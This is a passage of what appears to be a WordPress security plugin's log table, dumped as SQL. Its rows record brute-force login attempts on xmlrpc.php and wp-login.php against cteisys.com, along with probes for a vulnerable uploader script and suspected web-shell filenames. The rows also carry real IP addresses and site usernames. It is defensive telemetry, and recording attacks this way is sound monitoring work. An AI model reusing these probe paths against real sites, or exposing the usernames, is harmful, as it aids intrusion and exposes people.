com/xmlrpc.php',0,0,0),('45.77.131.169',760054697,'newd',0,1664583840.9435,152,'XEkv2bAjhYUCeOioDrBN7Q0n','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.171.170.94',3198921310,'newd',0,1664583556.4622,152,'P9gNh5alKmns3icYJpxI0VrW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.149.229',2671875557,'admin',0,1664583089.0822,152,'dkbZFUKBxTpNw47Ch5EcWRsP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'newd',0,1664582857.1169,7,'bA9XGsmO0p6J1QaNl8Vu2o3w','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('111.223.36.152',1876894872,'admin',0,1664582824.5082,152,'b98Jk1dseuD0fEjGFT43BhXO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.255.178.218',1962914522,'newd',0,1664589410.6164,152,'pa13cLCIA9lQ5fkMZXnUeytx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.219.142',2671893390,'newd',0,1664589193.3450,152,'kHGKre1xDCNWM479b36udOPp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.105.240',2261871088,'newd',0,1664588641.4450,152,'hCf6B8Tneu1q72rOGklYMSmt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1664588340.6554,152,'cJ5Ok4CMoLRfZ9QGaXxsiwI8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.121.5',3098048773,'newd',0,1664588099.7996,152,'uYJiLlfQ8kI9MjO21BVRbvCD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.126.219.43',3112098603,'newd',0,1664587586.5127,152,'iXhcDdBS5OxIpksK18uRmgYV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.95.162',1701011362,'newd',0,1664587269.5258,152,'zItYDqXPAEoe1m0wGCfvyRVO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.231.84.41',1541887017,'joyce',0,1664587095.2947,152,'81VhmK092ibXvHzQFWPY4LeC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.117.143',3451483535,'nathaniel-lipka',0,1664587050.8486,51,'y0EKsPeGmrRVZ3uIaLhMXgQN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.254.111.139',587100043,'newd',0,1664587019.8662,152,'Pd4L2rvyKgOUtYHqeRhiQWxM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.201.41',2916403497,'newd',0,1664586747.4834,152,'YUgey17LXTO6dxK2C8sZtlIv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('158.255.80.210',2667532498,'newd',0,1664586205.3765,152,'iQUMxC5dKkA9wXZfr4B1LaJu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('39.106.15.209',661262289,'newd',0,1664590788.9265,152,'6siKw0rvHLhcd8NEpIbQe5jC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.205.115',2160577907,'newd',0,1664590473.8549,152,'5REuqdXvV8bpjUfIWKgm0ktN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1664590264.5737,152,'8h5LpkyRPQz2uV6EMWA34rDa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.42.98.32',3257557536,'newd',0,1664594973.8497,152,'kSy5TYla6cjbVAqsvEwGd4t8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.210.66.35',533873187,'newd',0,1664594598.4804,152,'da0qKm1b6JXctH9ZYF2lnMjO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.79.8.125',2018445437,'newd',0,1664594387.1324,152,'JKeMiCHuP9BxbETgOSoGn7md','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.49.20.77',3107001421,'newd',0,1664593990.4692,152,'xsOKIPzkoLF5veb7CNyWM068','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1664593758.2810,55,'4qoNAsbwz7UWO1mh3B0X5Fna','','19|0|0|0|cteisys.com/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php',0,19,0),('151.80.20.26',2538607642,'newd',0,1664593718.6072,152,'Wqoh2AT6HJKtp0FPNrR1IQiD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.15.215',1152847831,'newd',0,1664593484.2008,152,'n0IMv41fXNV3dsxWkEeP79qQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('72.167.51.34',1218917154,'newd',0,1664597447.8323,152,'ODGc1iQfmj6zMhvrtYSFUlnk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1664597287.4626,152,'hFCH4beBORI3YKl27jETfQ0q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('161.35.15.73',2703429449,'newd',0,1664597118.9205,152,'v80tONirTUMgH12VZuDRWxPS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1664596949.5258,152,'cIdBwxtRgA8nFGebfs5z7YZX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.241.5.213',3119580629,'newd',0,1664596821.0847,152,'XS5KlTgqLD1IR9ZHpjsMWkiu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.211.236',2733691884,'newd',0,1664601642.7403,152,'VdcjJoKbkDtEq7snL4Ox0A1B','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.213.170.208',601205456,'newd',0,1664601482.6199,152,'HBnxypZqijFuV5to8sevhWkf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.145.50.127',1737568895,'newd',0,1664601365.3578,152,'Uw07lOIgZ8cYdTuRriahHQmX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'nathaniel-lipka',0,1664601196.7485,51,'KSHbYqdpozxU5OrtJnTMAZaP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.246.108.230',3489033446,'newd',0,1664601174.7031,152,'rMkASI8mCLdsinGXRZ0jNluO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('93.114.235.167',1567812519,'newd',0,1664601078.9282,152,'1tyBc2n3eDFZxs4k0qplMm7i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.201.41',2916403497,'newd',0,1664600906.1119,152,'SLlpUDN1ZBxAeYo4nRIvbO3Q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.215.240.160',2732060832,'newd',0,1664600649.4065,152,'cf86a2yHsdQNYEpLB0uGMeWI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('38.242.135.133',653428613,'newd',0,1664600504.6434,152,'c9pv4jfVPdsOBIkTayLFxRoz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.25.74',1728584010,'newd',0,1664605132.5370,152,'FjSDJiBTUscZf4XmxwYb1Nuk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.233.192.83',1844035667,'newd',0,1664604933.9801,152,'uhJN18BHXaIdnfxsWQ3FYMeo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.222.69',1363467845,'newd',0,1664604773.7574,152,'sbeMKWnqOREgjJ8afdFQ51B9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('95.167.178.158',1604825758,'newd',0,1664604583.7759,152,'Q4Bwe3YMLFgjX0npt5K2OhSz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('66.45.251.157',1110309789,'newd',0,1664604435.3141,152,'d7HOa2TVKYJcwQoXtGSu6li0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.59.99.98',842752866,'newd',0,1664604256.6911,152,'W2yCIoTBLPkul5cRXQNfx9Mp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('144.202.93.42',2429181226,'newd',0,1664608091.9939,7,'YJZAtGHid3kpvR1zfVb9B7lW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.79.3',3496824579,'newd',0,1664608090.8262,7,'gGiH1xN8ZJjvzVqlaRf92AFo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.7.190.241',2634530545,'newd',0,1664608086.4134,7,'ZkAbsQ8GryLqpIeaJfK5XCB6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664608086.4016,7,'YeNFhVOf2P1wJl6aoQzbGE90','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('78.47.46.81',1311714897,'newd',0,1664608085.5166,7,'D5WLokOyzSvH9E18GX62mMxu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.12.250.252',3322739452,'admin',0,1664607643.9897,152,'E3sFbySJXhT7lPZWG14kLoaD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('143.198.161.92',2412159324,'newd',0,1664612644.5995,7,'7x9vIW2PHrdKQBlFgOznjV8o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.145.51.200',1737569224,'newd',0,1664612642.7998,152,'ubT4D6KSULeHZa2nx1lmYCNI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.210.181.102',1053996390,'newd',0,1664612440.0254,152,'pS9qHbC5l1nzM0m3IvNLaPTZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.14.89',1807552089,'nathaniel-lipka',0,1664612003.6698,51,'k7PVtKWT84j3Qey6rBdEnuMH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.21.74',2884900170,'newd',0,1664611817.9355,152,'RvSmwjHtTbZd9YAXNE2Gizfu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.255.64.58',872366138,'newd',0,1664611680.3479,152,'WTB8cvnAtYQHVyI3XGJUi0kM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.212.34.36',3168018980,'newd',0,1664617085.1876,152,'BweoslGKz2A30nH781k4VUrW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.225.33.99',3118539107,'newd',0,1664616865.9485,152,'CkMOiIy8rBtcb31vzxpfJ4oh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.180.120.176',1739880624,'newd',0,1664616393.9663,152,'HGsKIDPtuTg5YAXyLO62Nmp9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.187.24.159',633018527,'newd',0,1664616218.1456,152,'9utXYnV2OWNjglLPpUfM5B4v','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.75.146.208',860590800,'newd',0,1664615975.9354,152,'fj4iXVGwrsTeqmDBYC1J2ISv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.6.184',1807550136,'nathaniel-lipka',0,1664615945.1780,51,'GCEKJATxqiM3jYQt9HzZb2lp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.144.49.214',2727358934,'newd',0,1664615792.0193,152,'BzZRkM7gXPwQEd1s9nIbxuYU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.39.240.246',338161910,'',0,1664615788.4946,55,'Sfz9YH7g6qyvAxltbp2B1UDw','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('64.235.231.20',1089201940,'newd',0,1664615589.2767,152,'aSbdsviOkHAnmTPLfhI1eywz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.215.38',2916407078,'newd',0,1664615118.7215,152,'sMb9rDqyfRu4dg236wicOCYG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('141.98.102.179',2372036275,'joyce',0,1664615039.3396,152,'ZITaMigLDkw4cvonJ0XflzHt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('111.90.150.171',1868207787,'newd',0,1664614940.3935,152,'uXhr8FxGcS426eoRmYAfqUdv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.215.38',2916407078,'newd',0,1664620178.9313,152,'acVY7tsRGn59bpW8yxfQE1Lm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.215.38',2916407078,'newd',0,1664619928.0770,152,'AwhStxTVDqpsc9ngCbz4ZQOj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.102.148.185',1046910137,'joyce',0,1664619771.2865,152,'EXQwrqsLdciKuCM2OFmeWxAD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.14.141.22',1779338518,'newd',0,1664619271.9576,152,'du48QmDkz50hYPLXnxR2lvyB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.92.27.198',1734089670,'newd',0,1664619051.7049,152,'T9GeAmavVJ80b7hwCypXL52q','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.176.230.188',3249596092,'newd',0,1664618599.5465,152,'QwOhkclUrAdGMRJIZmPjFTxn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.126.8.92',3514697820,'newd',0,1664627364.9277,152,'TjBUKb39RV8tY4qaMsQmSJd5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('199.188.207.230',3351039974,'admin',0,1664625521.1606,152,'tMXVKuEpHJ3YfUGZln2I05Oe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.189.63',1753464127,'wwwadmin',0,1664624262.4453,152,'S2TuqIsezxRoOB8L1rA5dXVa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.224.23.225',1541412833,'wadminw',0,1664623619.4131,152,'QbWeGx1shBw9oq4uAUZHrY8t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.236.194.143',2917974671,'newd',0,1664623332.2462,152,'k8s6xo2tNTveFpfHgzGP3rwO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.149.77.114',764759410,'newd',0,1664623107.1049,152,'iEaU5IkfucZxyJmrhWoDCbd2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1664622866.3303,152,'7I19OKqm3BbP8SYVtcRfZpCL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('42.200.109.156',717778332,'newd',0,1664622618.5951,152,'sOlC5Rh34r6tUAQKHxcDydVo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.214.169.69',1540794693,'joyce',0,1664622426.7604,152,'wKCkfhHiZjuNDgmS94op7yBJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.103.185',1806985145,'newd',0,1664622175.2685,152,'FoMHpslKJWqBx230NncjGPkV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.81.214.91',3226588763,'newd',0,1664627122.2949,152,'IbKyZaveqAxM2WP3BRCkUcgL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.174.93',148024925,'newd',0,1664626902.2523,152,'RrG2LqE9fcvuTpXAdW7VoMxO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.39.235',3496814571,'newd',0,1664626655.1513,152,'8FfZgQx9jEpa7CyukNhslUXb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.68.97.70',574906694,'newd',0,1664626456.2857,152,'lo8Jyi3DsuaHLE2VAUQCRXnr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.203.31.171',2680889259,'admin',0,1664625990.8601,152,'bJcl2AeDXHWPn9LhzdRErkOU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.209.105.240',2261871088,'admin',0,1664625715.2923,152,'sc0Au3pHWKDFZVTUzndlaSrE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.195.88.209',314792145,'newd',0,1664630763.9829,152,'oIF07zkdM2SNmsZxwfUXtHAO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.72.236.73',2202594377,'newd',0,1664630262.6581,152,'MqmzO8gWZVEJpyefYSo2sknh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.99.104.35',3261294627,'joyce',0,1664630005.8590,152,'tTC8YlHJr712uGxSdbLOaDKU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.225.33.99',3118539107,'newd',0,1664629999.2736,152,'h1PfGiW8IFOKj2uRYDqCyaps','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.219.142',2671893390,'newd',0,1664629779.9263,152,'iIfqjsYd2c5XomVKvRxOU8Fh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.125.239.179',763228083,'newd',0,1664629494.0697,152,'LnoyKmGRJY76q3FHhD9XlT8C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.151.98.168',3650577064,'joyce',0,1664629354.1996,152,'ipBN1Ykq25d6gEDx0CAVebIM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.180.107.103',1806986087,'newd',0,1664634907.8190,152,'9ikvMnswN7mqYI6TedU3at0f','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.70.61.131',2454076803,'joyce',0,1664634553.7555,152,'Ce3c9aXPzrq7ltT2NBdkyjYm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.235.70',1734011718,'newd',0,1664634389.1354,152,'LNDKSjXvIVEoP4HaYpRuZJ73','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.154.177.165',1738191269,'newd',0,1664634153.2418,152,'fRATjE0HehQNL7PKW6X9FV2D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.166.182.177',1738978993,'newd',0,1664633876.8159,152,'kwSThPLW27UvBxc9GO4rpDYV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.195.88.209',314792145,'newd',0,1664633694.9407,152,'6y341VgoJMhRTS8aj7KwPvBY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.38.88.250',3324401914,'newd',0,1664633195.3909,152,'YQoCM6NFJzKVkPthvqb2HEa9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('112.78.4.244',1884161268,'newd',0,1664632898.0502,152,'t4h1L8sjN37Hok5Ydz6TIbqr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.222.69',1363467845,'newd',0,1664638170.4524,152,'HecugK14jPZvyb2G0SnV5Jmz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1664637898.0733,152,'V8iT4HmQ0YqvJebR2cEfW1zo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.235.91',1734011739,'newd',0,1664637407.8625,152,'UfKSdjTt6PHQNME9GJWrLxg2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('43.225.53.24',736179480,'newd',0,1664637209.4353,152,'cJsGNua4n3pI508jrAlyDzmw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.187.235',3583556587,'joyce',0,1664637069.8956,152,'dXLFbuUg92JRfZt1y7GwWsOA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.98.60.32',3328326688,'Joyce',0,1664637041.3815,51,'xrCqTjk7vXoUhRz352twgs0J','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.109.101.102',342713702,'newd',0,1664636924.6110,152,'7Os4CNRHrY5wuE6cxZSDGb3z','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.145.68.131',3197191299,'newd',0,1664636703.3214,152,'JhaORgtbz6dciM4IYe7n5xyH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.152.162.74',3583550026,'joyce',0,1664636560.7398,152,'9aMO38Cpcxim1HoLyhUqkYbV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.197.26',2916402458,'newd',0,1664636424.9374,152,'yrmJ4Q0vesnauC6lxzf2hFDA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.107.33.26',795549978,'newd',0,1664640877.1500,152,'0US3i8dKLFDklW4ba1fOn25s','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.210.66.35',533873187,'newd',0,1664640677.3005,152,'VFy9AMiYD8QHoeuW1KkJOqsS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('42.200.109.156',717778332,'newd',0,1664640381.1255,152,'u2N6afbBZJp1QtnEcUPkwFiM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664644396.3232,152,'UAojYS7sMkd2qEp1guDO80mf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.211.177',2487800753,'newd',0,1664644173.0026,152,'Qf5wOeV2ThbAmBYCGl7PjR8i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.131.189.63',1753464127,'newd',0,1664643651.5142,152,'vUisYbQWgmPNL4yAK2teXFCp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('171.244.17.110',2884899182,'newd',0,1664648280.3979,152,'Z6qwFJ0bRdECPjcVfYsikzxn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664648004.0436,152,'7nFtoMjHImz5rbVgUxwPSOuk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.222.54.214',2984130262,'newd',0,1664647767.3791,152,'WSVo7IUegBZGKL6b3MOqJaXy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.193.197.89',599901529,'newd',0,1664647471.3467,152,'chZ7gp8Qa0NCLvI24ndmy9xH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1664651118.8749,152,'sPjkud37OvDQcCwi180VzmZE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.109.101.102',342713702,'newd',0,1664654645.1988,152,'cekosCJphH45zaV6K3FBPIqO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('187.32.188.214',3139484886,'newd',0,1664659105.3920,152,'nQIlcGJgwaEKSmUHzWDbo3FN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.106.229.31',1466623263,'newd',0,1664658853.9171,152,'phBz0b1q2UNZ6lTyc9frO8K5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.40.238.50',2032725554,'newd',0,1664658560.2656,152,'MV5WCtJPZUFbHGyj8uqdBQR0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.42.98.32',3257557536,'newd',0,1664662968.7572,152,'d5uGTAjHvq8xzRl947arEUXt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.165.237.48',3584421168,'newd',0,1664662738.5478,152,'l0m3KAYLgU67nMs2WuZo94Sk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1664662420.5891,152,'3NwSPLd4s0One9Z1GB85MjxC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.135.37.49',1485251889,'newd',0,1664662203.2398,152,'8TUBINqVgxKHlZrS3jFzhXWp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.159.15.23',866062103,'newd',0,1664661868.6240,152,'QPBaLjc3mInrURopVG9WzXZl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.201.41',2916403497,'newd',0,1664667531.9294,152,'lzSFsjd6RXcqKGYxDnI1vLB4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('216.245.215.122',3639990138,'newd',0,1664666659.5487,152,'4ynRdNupMPhcx1T5ZbOEYwgi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664666365.6264,152,'waK6BDVcjC34GF1T8gPhfXAi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.74.118.242',1732933362,'newd',0,1664666096.2084,152,'kdE6jiVrB7sXpThLg5U3Pq2C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.131.4.125',58918013,'newd',0,1664665521.5417,152,'Gb239tdzEnD7YxAQ1NCrsXqH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.99.90.175',1701010095,'newd',0,1664665209.9905,152,'uANP1pYg9QVhXyCJIZLGWSbe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.3.40',1807549224,'newd',0,1664671433.2910,7,'w1RziQlBypfce6kUY9ZjMDGE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.165.184.76',1386592332,'newd',0,1664669848.5469,152,'plHeWNaBdfq3X68ZQyTtSObC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.210.251.22',869464854,'newd',0,1664669606.4129,152,'MaASb16H9ZRtJwOcqLdreICh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('8.210.102.36',148006436,'newd',0,1664669256.9965,152,'aHswLIBEWFMk5UrY6DyqJCNt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.24.52.65',2014852161,'newd',0,1664668996.0511,152,'kESNLJtyK3r6n2Ij8ifubQzA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.142.136.99',864979043,'',0,1664679325.5790,55,'vjx9ekTI4lhYnF875CS6XUoW','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('198.98.50.216',3328324312,'newd',0,1664675160.6779,7,'2lfIbARpGZ5Y3LiwVgErx8Sm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.255.59.83',352271187,'',0,1664697036.5700,100,'6lzvnSrwWXaZFiPY9AuRB8cJ','','13|0|0|0|cteisys.com/wp-signin.php',0,13,0),('20.255.59.83',352271187,'',0,1664697035.7706,55,'eu3MGOdBWqAShRokU01Ii5cr','','19|0|0|0|cteisys.com/ups.php',0,19,0),('194.38.20.161',3257275553,'',0,1664687996.1228,55,'awK04vtbPDg1VehkyUZoA25p','','19|0|0|0|cteisys.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php',0,19,0),('198.98.48.183',3328323767,'newd',0,1664686289.7145,7,'lOzhVctvndumxKRZLJf4gYAF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.255.59.83',352271187,'',0,1664697034.9541,55,'c0DC4TWrAZUQSnilYjPzE3aL','','19|0|0|0|cteisys.com/beence.php',0,19,0),('209.141.47.94',3515690846,'Joyce',0,1664689910.3417,51,'ZM0kwsBNWHRJejFiUGEYt61a','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.55.206',3515693006,'nathaniel-lipka',0,1664689636.8022,51,'M0GzyTXYHEUkcvL6eNdWS9ZQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.255.59.83',352271187,'',0,1664697034.1458,55,'4Sxn8jmpeJU0CNciPbfAWI3q','','19|0|0|0|cteisys.com/wp_wrong_datlib.php',0,19,0),('20.255.59.83',352271187,'',0,1664697032.9629,55,'ScVoCpsGEIrbNawzRJMy5iW9','','19|0|0|0|cteisys.com/doc.php',0,19,0),('20.255.59.83',352271187,'',0,1664697032.0516,55,'IcbOHTGtNJzPnrds45xlFqLm','','19|0|0|0|cteisys.com/radio.php',0,19,0),('107.189.14.89',1807552089,'nathaniel-lipka',0,1664691204.3267,51,'NXhjsTcnGx6eFH1tqLmUl8OE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('20.255.59.83',352271187,'',0,1664697031.1636,10,'4XQhMJnYFBDOZcfgKjG95mVU','','707|0|0|0|cteisys.com/1index.php',0,707,0),('20.255.59.83',352271187,'',0,1664697031.1598,55,'4XQhMJnYFBDOZcfgKjG95mVU','','19|0|0|0|cteisys.com/1index.php',0,19,0),('20.255.59.83',352271187,'',0,1664697029.5416,55,'QXtyAL1MZUjlK6r0hVSqsE9i','','19|0|0|0|cteisys.com/s_ne.php',0,19,0),('20.255.59.83',352271187,'',0,1664697028.2324,55,'Ulz0n8BybmIVJkj5FKOpTo42','','19|0|0|0|cteisys.com/s_e.php',0,19,0),('20.255.59.83',352271187,'',0,1664697025.4792,55,'u4QXoGHWqws1O6m7zFkRMTxd','','19|0|0|0|cteisys.com/wp-admin/style.php',0,19,0),('20.255.59.83',352271187,'',0,1664697024.7383,55,'z47uAcbvTQIwtkUZDhpHefq1','','19|0|0|0|cteisys.com/style.php',0,19,0),('107.189.3.40',1807549224,'newd',0,1664695980.9090,7,'tduesP5TCvaxDGRMZ8H3cK9k','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.128.104.173',2994759853,'newd',0,1664706645.0006,152,'jXJfLShcB5n4NWHdiYOuFIg7','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.210.140',2487800460,'newd',0,1664706380.8248,152,'Dc524BQdphFzMPOLmHXRkAvt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.214.43.118',1490430838,'',0,1664702592.0093,55,'oIzV3iYKQS4nLm095cqZHxs1','','19|0|0|0|cteisys.com/phpinfi.php',0,19,0),('88.214.43.118',1490430838,'',0,1664702592.0093,55,'0l8gHoQhmiXcNYLw7PZG1OtK','','19|0|0|0|cteisys.com/phpinfi.php',0,19,0),('185.114.247.102',3111319398,'',0,1664700521.6298,55,'3DQjNgJi9o5IquChWF6pMRtl','','19|0|0|0|cteisys.com/style.php',0,19,0),('209.141.48.210',3515691218,'Joyce',0,1664699047.6437,51,'w6g2enGybBf0tzHIRud4xm7l','','0|0|0|0|cteisys.com/wp-login.php'